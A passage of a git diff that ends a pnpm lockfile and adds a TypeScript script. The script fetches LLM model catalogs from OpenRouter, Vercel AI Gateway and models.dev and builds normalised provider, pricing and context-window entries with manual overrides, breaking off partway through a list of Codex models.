- google-logging-utils: 1.1.3 - jws: 4.0.1 - transitivePeerDependencies: - - supports-color - - google-logging-utils@1.1.3: {} - - http-proxy-agent@7.0.2: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - https-proxy-agent@7.0.6: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - transitivePeerDependencies: - - supports-color - - ip-address@10.1.0: {} - - is-fullwidth-code-point@3.0.0: {} - - isexe@2.0.0: {} - - jackspeak@3.4.3: - dependencies: - '@isaacs/cliui': 8.0.2 - optionalDependencies: - '@pkgjs/parseargs': 0.11.0 - - json-bigint@1.0.0: - dependencies: - bignumber.js: 9.3.1 - - json-schema-to-ts@3.1.1: - dependencies: - '@babel/runtime': 7.28.6 - ts-algebra: 2.0.0 - - json-schema-traverse@1.0.0: {} - - jwa@2.0.1: - dependencies: - buffer-equal-constant-time: 1.0.1 - ecdsa-sig-formatter: 1.0.11 - safe-buffer: 5.2.1 - - jws@4.0.1: - dependencies: - jwa: 2.0.1 - safe-buffer: 5.2.1 - - long@5.3.2: {} - - lru-cache@10.4.3: {} - - lru-cache@7.18.3: {} - - minimatch@9.0.9: - dependencies: - brace-expansion: 2.0.2 - - minipass@7.1.3: {} - - ms@2.1.3: {} - - netmask@2.0.2: {} - - 
node-domexception@1.0.0: {} - - node-fetch@3.3.2: - dependencies: - data-uri-to-buffer: 4.0.1 - fetch-blob: 3.2.0 - formdata-polyfill: 4.0.10 - - openai@6.26.0(ws@8.19.0)(zod@4.3.6): - optionalDependencies: - ws: 8.19.0 - zod: 4.3.6 - - p-retry@4.6.2: - dependencies: - '@types/retry': 0.12.0 - retry: 0.13.1 - - pac-proxy-agent@7.2.0: - dependencies: - '@tootallnate/quickjs-emscripten': 0.23.0 - agent-base: 7.1.4 - debug: 4.4.3 - get-uri: 6.0.5 - http-proxy-agent: 7.0.2 - https-proxy-agent: 7.0.6 - pac-resolver: 7.0.1 - socks-proxy-agent: 8.0.5 - transitivePeerDependencies: - - supports-color - - pac-resolver@7.0.1: - dependencies: - degenerator: 5.0.1 - netmask: 2.0.2 - - package-json-from-dist@1.0.1: {} - - path-expression-matcher@1.1.3: {} - - path-key@3.1.1: {} - - path-scurry@1.11.1: - dependencies: - lru-cache: 10.4.3 - minipass: 7.1.3 - - protobufjs@7.5.4: - dependencies: - '@protobufjs/aspromise': 1.1.2 - '@protobufjs/base64': 1.1.2 - '@protobufjs/codegen': 2.0.4 - '@protobufjs/eventemitter': 1.1.0 - '@protobufjs/fetch': 1.1.0 - '@protobufjs/float': 1.0.2 - '@protobufjs/inquire': 1.1.0 - '@protobufjs/path': 1.1.2 - '@protobufjs/pool': 1.1.0 - '@protobufjs/utf8': 1.1.0 - '@types/node': 25.5.0 - long: 5.3.2 - - proxy-agent@6.5.0: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - http-proxy-agent: 7.0.2 - https-proxy-agent: 7.0.6 - lru-cache: 7.18.3 - pac-proxy-agent: 7.2.0 - proxy-from-env: 1.1.0 - socks-proxy-agent: 8.0.5 - transitivePeerDependencies: - - supports-color - - proxy-from-env@1.1.0: {} - - require-from-string@2.0.2: {} - - retry@0.13.1: {} - - rimraf@5.0.10: - dependencies: - glob: 10.5.0 - - safe-buffer@5.2.1: {} - - shebang-command@2.0.0: - dependencies: - shebang-regex: 3.0.0 - - shebang-regex@3.0.0: {} - - signal-exit@4.1.0: {} - - smart-buffer@4.2.0: {} - - socks-proxy-agent@8.0.5: - dependencies: - agent-base: 7.1.4 - debug: 4.4.3 - socks: 2.8.7 - transitivePeerDependencies: - - supports-color - - socks@2.8.7: - dependencies: - 
ip-address: 10.1.0 - smart-buffer: 4.2.0 - - source-map@0.6.1: - optional: true - - string-width@4.2.3: - dependencies: - emoji-regex: 8.0.0 - is-fullwidth-code-point: 3.0.0 - strip-ansi: 6.0.1 - - string-width@5.1.2: - dependencies: - eastasianwidth: 0.2.0 - emoji-regex: 9.2.2 - strip-ansi: 7.2.0 - - strip-ansi@6.0.1: - dependencies: - ansi-regex: 5.0.1 - - strip-ansi@7.2.0: - dependencies: - ansi-regex: 6.2.2 - - strnum@2.2.0: {} - - ts-algebra@2.0.0: {} - - tslib@2.8.1: {} - - undici-types@7.18.2: {} - - undici@7.24.4: {} - - web-streams-polyfill@3.3.3: {} - - which@2.0.2: - dependencies: - isexe: 2.0.0 - - wrap-ansi@7.0.0: - dependencies: - ansi-styles: 4.3.0 - string-width: 4.2.3 - strip-ansi: 6.0.1 - - wrap-ansi@8.1.0: - dependencies: - ansi-styles: 6.2.3 - string-width: 5.1.2 - strip-ansi: 7.2.0 - - ws@8.19.0: {} - - zod-to-json-schema@3.25.1(zod@4.3.6): - dependencies: - zod: 4.3.6 - - zod@4.3.6: {} diff --git a/packages/pi-ai/scripts/generate-models.ts b/packages/pi-ai/scripts/generate-models.ts new file mode 100644 index 000000000..839428bcb --- /dev/null +++ b/packages/pi-ai/scripts/generate-models.ts @@ -0,0 +1,1543 @@ +#!/usr/bin/env tsx + +import { writeFileSync } from "fs"; +import { join, dirname } from "path"; +import { fileURLToPath } from "url"; +import { Api, KnownProvider, Model } from "../src/types.js"; + +const __filename = fileURLToPath(import.meta.url); +const __dirname = dirname(__filename); +const packageRoot = join(__dirname, ".."); + +interface ModelsDevModel { + id: string; + name: string; + tool_call?: boolean; + reasoning?: boolean; + limit?: { + context?: number; + output?: number; + }; + cost?: { + input?: number; + output?: number; + cache_read?: number; + cache_write?: number; + }; + modalities?: { + input?: string[]; + }; + provider?: { + npm?: string; + }; +} + +interface AiGatewayModel { + id: string; + name?: string; + context_window?: number; + max_tokens?: number; + tags?: string[]; + pricing?: { + input?: string | number; 
+ output?: string | number; + input_cache_read?: string | number; + input_cache_write?: string | number; + }; +} + +const COPILOT_STATIC_HEADERS = { + "User-Agent": "GitHubCopilotChat/0.35.0", + "Editor-Version": "vscode/1.107.0", + "Editor-Plugin-Version": "copilot-chat/0.35.0", + "Copilot-Integration-Id": "vscode-chat", +} as const; + +const AI_GATEWAY_MODELS_URL = "https://ai-gateway.vercel.sh/v1"; +const AI_GATEWAY_BASE_URL = "https://ai-gateway.vercel.sh"; + +async function fetchOpenRouterModels(): Promise[]> { + try { + console.log("Fetching models from OpenRouter API..."); + const response = await fetch("https://openrouter.ai/api/v1/models"); + const data = await response.json(); + + const models: Model[] = []; + + for (const model of data.data) { + // Only include models that support tools + if (!model.supported_parameters?.includes("tools")) continue; + + // Parse provider from model ID + let provider: KnownProvider = "openrouter"; + let modelKey = model.id; + + modelKey = model.id; // Keep full ID for OpenRouter + + // Parse input modalities + const input: ("text" | "image")[] = ["text"]; + if (model.architecture?.modality?.includes("image")) { + input.push("image"); + } + + // Convert pricing from $/token to $/million tokens + const inputCost = parseFloat(model.pricing?.prompt || "0") * 1_000_000; + const outputCost = parseFloat(model.pricing?.completion || "0") * 1_000_000; + const cacheReadCost = parseFloat(model.pricing?.input_cache_read || "0") * 1_000_000; + const cacheWriteCost = parseFloat(model.pricing?.input_cache_write || "0") * 1_000_000; + + const normalizedModel: Model = { + id: modelKey, + name: model.name, + api: "openai-completions", + baseUrl: "https://openrouter.ai/api/v1", + provider, + reasoning: model.supported_parameters?.includes("reasoning") || false, + input, + cost: { + input: inputCost, + output: outputCost, + cacheRead: cacheReadCost, + cacheWrite: cacheWriteCost, + }, + contextWindow: model.context_length || 4096, + 
maxTokens: model.top_provider?.max_completion_tokens || 4096, + }; + models.push(normalizedModel); + } + + console.log(`Fetched ${models.length} tool-capable models from OpenRouter`); + return models; + } catch (error) { + console.error("Failed to fetch OpenRouter models:", error); + return []; + } +} + +async function fetchAiGatewayModels(): Promise[]> { + try { + console.log("Fetching models from Vercel AI Gateway API..."); + const response = await fetch(`${AI_GATEWAY_MODELS_URL}/models`); + const data = await response.json(); + const models: Model[] = []; + + const toNumber = (value: string | number | undefined): number => { + if (typeof value === "number") { + return Number.isFinite(value) ? value : 0; + } + const parsed = parseFloat(value ?? "0"); + return Number.isFinite(parsed) ? parsed : 0; + }; + + const items = Array.isArray(data.data) ? (data.data as AiGatewayModel[]) : []; + for (const model of items) { + const tags = Array.isArray(model.tags) ? model.tags : []; + // Only include models that support tools + if (!tags.includes("tool-use")) continue; + + const input: ("text" | "image")[] = ["text"]; + if (tags.includes("vision")) { + input.push("image"); + } + + const inputCost = toNumber(model.pricing?.input) * 1_000_000; + const outputCost = toNumber(model.pricing?.output) * 1_000_000; + const cacheReadCost = toNumber(model.pricing?.input_cache_read) * 1_000_000; + const cacheWriteCost = toNumber(model.pricing?.input_cache_write) * 1_000_000; + + models.push({ + id: model.id, + name: model.name || model.id, + api: "anthropic-messages", + baseUrl: AI_GATEWAY_BASE_URL, + provider: "vercel-ai-gateway", + reasoning: tags.includes("reasoning"), + input, + cost: { + input: inputCost, + output: outputCost, + cacheRead: cacheReadCost, + cacheWrite: cacheWriteCost, + }, + contextWindow: model.context_window || 4096, + maxTokens: model.max_tokens || 4096, + }); + } + + console.log(`Fetched ${models.length} tool-capable models from Vercel AI Gateway`); + return 
models; + } catch (error) { + console.error("Failed to fetch Vercel AI Gateway models:", error); + return []; + } +} + +async function loadModelsDevData(): Promise[]> { + try { + console.log("Fetching models from models.dev API..."); + const response = await fetch("https://models.dev/api.json"); + const data = await response.json(); + + const models: Model[] = []; + + // Process Amazon Bedrock models + if (data["amazon-bedrock"]?.models) { + for (const [modelId, model] of Object.entries(data["amazon-bedrock"].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + let id = modelId; + + if (id.startsWith("ai21.jamba")) { + // These models doesn't support tool use in streaming mode + continue; + } + + if (id.startsWith("mistral.mistral-7b-instruct-v0")) { + // These models doesn't support system messages + continue; + } + + models.push({ + id, + name: m.name || id, + api: "bedrock-converse-stream" as const, + provider: "amazon-bedrock" as const, + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: m.reasoning === true, + input: (m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"]) as ("text" | "image")[], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Anthropic models + if (data.anthropic?.models) { + for (const [modelId, model] of Object.entries(data.anthropic.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider: "anthropic", + baseUrl: "https://api.anthropic.com", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Google models + if (data.google?.models) { + for (const [modelId, model] of Object.entries(data.google.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "google-generative-ai", + provider: "google", + baseUrl: "https://generativelanguage.googleapis.com/v1beta", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process OpenAI models + if (data.openai?.models) { + for (const [modelId, model] of Object.entries(data.openai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-responses", + provider: "openai", + baseUrl: "https://api.openai.com/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Groq models + if (data.groq?.models) { + for (const [modelId, model] of Object.entries(data.groq.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "groq", + baseUrl: "https://api.groq.com/openai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Cerebras models + if (data.cerebras?.models) { + for (const [modelId, model] of Object.entries(data.cerebras.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "cerebras", + baseUrl: "https://api.cerebras.ai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process xAi models + if (data.xai?.models) { + for (const [modelId, model] of Object.entries(data.xai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "xai", + baseUrl: "https://api.x.ai/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process zAi models + if (data.zai?.models) { + for (const [modelId, model] of Object.entries(data.zai.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + const supportsImage = m.modalities?.input?.includes("image") + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "zai", + baseUrl: "https://api.z.ai/api/coding/paas/v4", + reasoning: m.reasoning === true, + input: supportsImage ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + compat: { + supportsDeveloperRole: false, + thinkingFormat: "zai", + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Mistral models + if (data.mistral?.models) { + for (const [modelId, model] of Object.entries(data.mistral.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "mistral-conversations", + provider: "mistral", + baseUrl: "https://api.mistral.ai", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process Hugging Face models + if (data.huggingface?.models) { + for (const [modelId, model] of Object.entries(data.huggingface.models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "openai-completions", + provider: "huggingface", + baseUrl: "https://router.huggingface.co/v1", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + compat: { + supportsDeveloperRole: false, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process OpenCode models (Zen and Go) + // API mapping based on provider.npm field: + // - @ai-sdk/openai → openai-responses + // - @ai-sdk/anthropic → anthropic-messages + // - @ai-sdk/google → google-generative-ai + // - null/undefined/@ai-sdk/openai-compatible → openai-completions + const opencodeVariants = [ + { key: "opencode", provider: "opencode", basePath: "https://opencode.ai/zen" }, + { key: "opencode-go", provider: "opencode-go", basePath: "https://opencode.ai/zen/go" }, + ] as const; + + for (const variant of opencodeVariants) { + if (!data[variant.key]?.models) continue; + + for (const [modelId, model] of Object.entries(data[variant.key].models)) { + const m = model as ModelsDevModel & { status?: string }; + if (m.tool_call !== true) continue; + if (m.status === "deprecated") continue; + + const npm = m.provider?.npm; + let api: Api; + let baseUrl: string; + + if (npm === "@ai-sdk/openai") { + api = "openai-responses"; + baseUrl = `${variant.basePath}/v1`; + } else if (npm === "@ai-sdk/anthropic") { + api = "anthropic-messages"; + // Anthropic SDK appends /v1/messages to baseURL + baseUrl = variant.basePath; + } else if (npm === "@ai-sdk/google") { + api = "google-generative-ai"; + baseUrl = `${variant.basePath}/v1`; + } else { + // null, undefined, or @ai-sdk/openai-compatible + api = "openai-completions"; + baseUrl = `${variant.basePath}/v1`; + } + + models.push({ + id: modelId, + name: m.name || modelId, + api, + provider: variant.provider, + baseUrl, + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + // Process GitHub Copilot models + if (data["github-copilot"]?.models) { + for (const [modelId, model] of Object.entries(data["github-copilot"].models)) { + const m = model as ModelsDevModel & { status?: string }; + if (m.tool_call !== true) continue; + if (m.status === "deprecated") continue; + + // Claude 4.x models route to Anthropic Messages API + const isCopilotClaude4 = /^claude-(haiku|sonnet|opus)-4([.\-]|$)/.test(modelId); + // gpt-5 models require responses API, others use completions + const needsResponsesApi = modelId.startsWith("gpt-5") || modelId.startsWith("oswe"); + + const api: Api = isCopilotClaude4 + ? "anthropic-messages" + : needsResponsesApi + ? "openai-responses" + : "openai-completions"; + + const copilotModel: Model = { + id: modelId, + name: m.name || modelId, + api, + provider: "github-copilot", + baseUrl: "https://api.individual.githubcopilot.com", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 128000, + maxTokens: m.limit?.output || 8192, + headers: { ...COPILOT_STATIC_HEADERS }, + // compat only applies to openai-completions + ...(api === "openai-completions" ? 
{ + compat: { + supportsStore: false, + supportsDeveloperRole: false, + supportsReasoningEffort: false, + }, + } : {}), + }; + + models.push(copilotModel); + } + } + + // Process MiniMax models + const minimaxVariants = [ + { key: "minimax", provider: "minimax", baseUrl: "https://api.minimax.io/anthropic" }, + { key: "minimax-cn", provider: "minimax-cn", baseUrl: "https://api.minimaxi.com/anthropic" }, + ] as const; + + for (const { key, provider, baseUrl } of minimaxVariants) { + if (data[key]?.models) { + for (const [modelId, model] of Object.entries(data[key].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider, + // MiniMax's Anthropic-compatible API - SDK appends /v1/messages + baseUrl, + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? ["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + } + + // Process Kimi For Coding models + if (data["kimi-for-coding"]?.models) { + for (const [modelId, model] of Object.entries(data["kimi-for-coding"].models)) { + const m = model as ModelsDevModel; + if (m.tool_call !== true) continue; + + models.push({ + id: modelId, + name: m.name || modelId, + api: "anthropic-messages", + provider: "kimi-coding", + // Kimi For Coding's Anthropic-compatible API - SDK appends /v1/messages + baseUrl: "https://api.kimi.com/coding", + reasoning: m.reasoning === true, + input: m.modalities?.input?.includes("image") ? 
["text", "image"] : ["text"], + cost: { + input: m.cost?.input || 0, + output: m.cost?.output || 0, + cacheRead: m.cost?.cache_read || 0, + cacheWrite: m.cost?.cache_write || 0, + }, + contextWindow: m.limit?.context || 4096, + maxTokens: m.limit?.output || 4096, + }); + } + } + + console.log(`Loaded ${models.length} tool-capable models from models.dev`); + return models; + } catch (error) { + console.error("Failed to load models.dev data:", error); + return []; + } +} + +async function generateModels() { + // Fetch models from both sources + // models.dev: Anthropic, Google, OpenAI, Groq, Cerebras + // OpenRouter: xAI and other providers (excluding Anthropic, Google, OpenAI) + // AI Gateway: OpenAI-compatible catalog with tool-capable models + const modelsDevModels = await loadModelsDevData(); + const openRouterModels = await fetchOpenRouterModels(); + const aiGatewayModels = await fetchAiGatewayModels(); + + // Combine models (models.dev has priority) + const allModels = [...modelsDevModels, ...openRouterModels, ...aiGatewayModels].filter( + (model) => + !((model.provider === "opencode" || model.provider === "opencode-go") && model.id === "gpt-5.3-codex-spark"), + ); + + // Fix incorrect cache pricing for Claude Opus 4.5 from models.dev + // models.dev has 3x the correct pricing (1.5/18.75 instead of 0.5/6.25) + const opus45 = allModels.find(m => m.provider === "anthropic" && m.id === "claude-opus-4-5"); + if (opus45) { + opus45.cost.cacheRead = 0.5; + opus45.cost.cacheWrite = 6.25; + } + + // Temporary overrides until upstream model metadata is corrected. 
+ for (const candidate of allModels) { + if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-opus-4-6-v1")) { + candidate.cost.cacheRead = 0.5; + candidate.cost.cacheWrite = 6.25; + candidate.contextWindow = 1000000; + } + if (candidate.provider === "amazon-bedrock" && candidate.id.includes("anthropic.claude-sonnet-4-6")) { + candidate.contextWindow = 1000000; + } + if ( + (candidate.provider === "anthropic" || + candidate.provider === "opencode" || + candidate.provider === "opencode-go") && + (candidate.id === "claude-opus-4-6" || + candidate.id === "claude-sonnet-4-6" || + candidate.id === "claude-opus-4.6" || + candidate.id === "claude-sonnet-4.6") + ) { + candidate.contextWindow = 1000000; + } + if ( + candidate.provider === "google-antigravity" && + (candidate.id === "claude-opus-4-6-thinking" || candidate.id === "claude-sonnet-4-6") + ) { + candidate.contextWindow = 1000000; + } + // OpenCode variants list Claude Sonnet 4/4.5 with 1M context, actual limit is 200K + if ( + (candidate.provider === "opencode" || candidate.provider === "opencode-go") && + (candidate.id === "claude-sonnet-4-5" || candidate.id === "claude-sonnet-4") + ) { + candidate.contextWindow = 200000; + } + if ((candidate.provider === "opencode" || candidate.provider === "opencode-go") && candidate.id === "gpt-5.4") { + candidate.contextWindow = 272000; + candidate.maxTokens = 128000; + } + if (candidate.provider === "openai" && candidate.id === "gpt-5.4") { + candidate.contextWindow = 272000; + candidate.maxTokens = 128000; + } + // Keep selected OpenRouter model metadata stable until upstream settles. 
+ if (candidate.provider === "openrouter" && candidate.id === "moonshotai/kimi-k2.5") { + candidate.cost.input = 0.41; + candidate.cost.output = 2.06; + candidate.cost.cacheRead = 0.07; + candidate.maxTokens = 4096; + } + if (candidate.provider === "openrouter" && candidate.id === "z-ai/glm-5") { + candidate.cost.input = 0.6; + candidate.cost.output = 1.9; + candidate.cost.cacheRead = 0.119; + } + } + + + // Add missing EU Opus 4.6 profile + if (!allModels.some((m) => m.provider === "amazon-bedrock" && m.id === "eu.anthropic.claude-opus-4-6-v1")) { + allModels.push({ + id: "eu.anthropic.claude-opus-4-6-v1", + name: "Claude Opus 4.6 (EU)", + api: "bedrock-converse-stream", + provider: "amazon-bedrock", + baseUrl: "https://bedrock-runtime.us-east-1.amazonaws.com", + reasoning: true, + input: ["text", "image"], + cost: { + input: 5, + output: 25, + cacheRead: 0.5, + cacheWrite: 6.25, + }, + contextWindow: 1000000, + maxTokens: 128000, + }); + } + + // Add missing Claude Opus 4.6 + if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-opus-4-6")) { + allModels.push({ + id: "claude-opus-4-6", + name: "Claude Opus 4.6", + api: "anthropic-messages", + baseUrl: "https://api.anthropic.com", + provider: "anthropic", + reasoning: true, + input: ["text", "image"], + cost: { + input: 5, + output: 25, + cacheRead: 0.5, + cacheWrite: 6.25, + }, + contextWindow: 1000000, + maxTokens: 128000, + }); + } + + // Add missing Claude Sonnet 4.6 + if (!allModels.some(m => m.provider === "anthropic" && m.id === "claude-sonnet-4-6")) { + allModels.push({ + id: "claude-sonnet-4-6", + name: "Claude Sonnet 4.6", + api: "anthropic-messages", + baseUrl: "https://api.anthropic.com", + provider: "anthropic", + reasoning: true, + input: ["text", "image"], + cost: { + input: 3, + output: 15, + cacheRead: 0.3, + cacheWrite: 3.75, + }, + contextWindow: 1000000, + maxTokens: 64000, + }); + } + + // Add missing Gemini 3.1 Flash Lite Preview until models.dev includes it. 
+ if (!allModels.some((m) => m.provider === "google" && m.id === "gemini-3.1-flash-lite-preview")) { + allModels.push({ + id: "gemini-3.1-flash-lite-preview", + name: "Gemini 3.1 Flash Lite Preview", + api: "google-generative-ai", + baseUrl: "https://generativelanguage.googleapis.com/v1beta", + provider: "google", + reasoning: true, + input: ["text", "image"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 1048576, + maxTokens: 65536, + }); + } + + // Add missing gpt models + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5-chat-latest")) { + allModels.push({ + id: "gpt-5-chat-latest", + name: "GPT-5 Chat Latest", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: false, + input: ["text", "image"], + cost: { + input: 1.25, + output: 10, + cacheRead: 0.125, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 16384, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex")) { + allModels.push({ + id: "gpt-5.1-codex", + name: "GPT-5.1 Codex", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 1.25, + output: 5, + cacheRead: 0.125, + cacheWrite: 1.25, + }, + contextWindow: 400000, + maxTokens: 128000, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.1-codex-max")) { + allModels.push({ + id: "gpt-5.1-codex-max", + name: "GPT-5.1 Codex Max", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 1.25, + output: 10, + cacheRead: 0.125, + cacheWrite: 0, + }, + contextWindow: 400000, + maxTokens: 128000, + }); + } + + if (!allModels.some(m => m.provider === "openai" && m.id === "gpt-5.3-codex-spark")) { + allModels.push({ + id: "gpt-5.3-codex-spark", + name: "GPT-5.3 Codex Spark", + api: 
"openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text"], + cost: { + input: 0, + output: 0, + cacheRead: 0, + cacheWrite: 0, + }, + contextWindow: 128000, + maxTokens: 16384, + }); + } + + // Add missing GitHub Copilot GPT-5.3 models until models.dev includes them. + const copilotBaseModel = allModels.find( + (m) => m.provider === "github-copilot" && m.id === "gpt-5.2-codex", + ); + if (copilotBaseModel) { + if (!allModels.some((m) => m.provider === "github-copilot" && m.id === "gpt-5.3-codex")) { + allModels.push({ + ...copilotBaseModel, + id: "gpt-5.3-codex", + name: "GPT-5.3 Codex", + }); + } + } + + if (!allModels.some((m) => m.provider === "openai" && m.id === "gpt-5.4")) { + allModels.push({ + id: "gpt-5.4", + name: "GPT-5.4", + api: "openai-responses", + baseUrl: "https://api.openai.com/v1", + provider: "openai", + reasoning: true, + input: ["text", "image"], + cost: { + input: 2.5, + output: 15, + cacheRead: 0.25, + cacheWrite: 0, + }, + contextWindow: 272000, + maxTokens: 128000, + }); + } + + // OpenAI Codex (ChatGPT OAuth) models + // NOTE: These are not fetched from models.dev; we keep a small, explicit list to avoid aliases. + // Context window is based on observed server limits (400s above ~272k), not marketing numbers. 
+ const CODEX_BASE_URL = "https://chatgpt.com/backend-api"; + const CODEX_CONTEXT = 272000; + const CODEX_MAX_TOKENS = 128000; + const codexModels: Model<"openai-codex-responses">[] = [ + { + id: "gpt-5.1", + name: "GPT-5.1", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.1-codex-max", + name: "GPT-5.1 Codex Max", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 1.25, output: 10, cacheRead: 0.125, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: "gpt-5.1-codex-mini", + name: "GPT-5.1 Codex Mini", + api: "openai-codex-responses", + provider: "openai-codex", + baseUrl: CODEX_BASE_URL, + reasoning: true, + input: ["text", "image"], + cost: { input: 0.25, output: 2, cacheRead: 0.025, cacheWrite: 0 }, + contextWindow: CODEX_CONTEXT, + maxTokens: CODEX_MAX_TOKENS, + }, + { + id: 